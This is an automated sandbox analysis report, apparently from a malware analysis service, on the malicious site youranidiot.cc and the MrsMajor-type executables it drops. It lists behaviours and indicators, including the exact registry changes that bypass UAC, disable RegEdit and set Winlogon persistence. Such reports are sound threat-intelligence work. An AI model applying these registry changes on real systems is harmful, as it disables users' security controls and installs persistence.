Analysis Overview
Threat Level: Known bad
The file http://youranidiot.cc was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies WinLogon for persistence
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Disables RegEdit via registry modification
Downloads MZ/PE file
Disables Task Manager via registry modification
Modifies system executable filetype association
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Drops desktop.ini file(s)
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Enumerates connected drives
Drops file in Windows directory
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Access Token Manipulation: Create Process with Token
Enumerates physical storage devices
Browser Information Discovery
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious use of SetWindowsHookEx
NTFS ADS
Delays execution with timeout.exe
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
System policy modification
Modifies Control Panel
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-08-31 00:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-08-31 00:45
Reported: 2024-08-31 00:53
Platform: win10v2004-20240802-en
Max time kernel: 433s
Max time network: 435s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\Program Files\\mrsmajor\\Launcher.vbs\"" | C:\Windows\System32\wscript.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\wscript.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\disableregistrytools = "1" | C:\Windows\System32\wscript.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\BossDaMajor.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\robux.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\robux.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\robux.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MrsMajor3.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\eulascr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BossDaMajor.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\eulascr.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\mrsmajor\CPUUsage.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\default.txt | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\Icon_resource\SkullIco.ico | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\Launcher.vbs | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Program Files\mrsmajor\CPUUsage.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\def_resource\creepysound.mp3 | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\def_resource\f11.mp4 | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\Doll_patch.xml | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\def_resource\@Tile@@.jpg | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\def_resource\Skullcur.cur | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\DreS_X.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\MrsMjrGuiLauncher.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\mrsmajorlauncher.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\MrsMjrGui.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\reStart.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\WinLogon.bat | C:\Windows\system32\wscript.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\robux.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\BossDaMajor.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\unregmp2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\robux.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\robux.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Cursors | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Cursors\Arrow = "C:\\Program Files\\mrsmajor\\def_resource\\skullcur.cur" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Cursors\AppStarting = "C:\\Program Files\\mrsmajor\\def_resource\\skullcur.cur" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Cursors\Hand = "C:\\Program Files\\mrsmajor\\def_resource\\skullcur.cur" | C:\Windows\System32\wscript.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "103" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2718105630-359604950-2820636825-1000\{FEA50EEF-5CC0-4FAD-9469-7C69C5B4D342} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2718105630-359604950-2820636825-1000\{79793BAC-5654-4ACB-93FD-7110AB5C49A8} | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 745914.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 925248.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 637841.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 557387.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 872608.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 887496.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system | C:\Windows\System32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\wscript.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youranidiot.cc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcd73946f8,0x7ffcd7394708,0x7ffcd7394718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3380 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
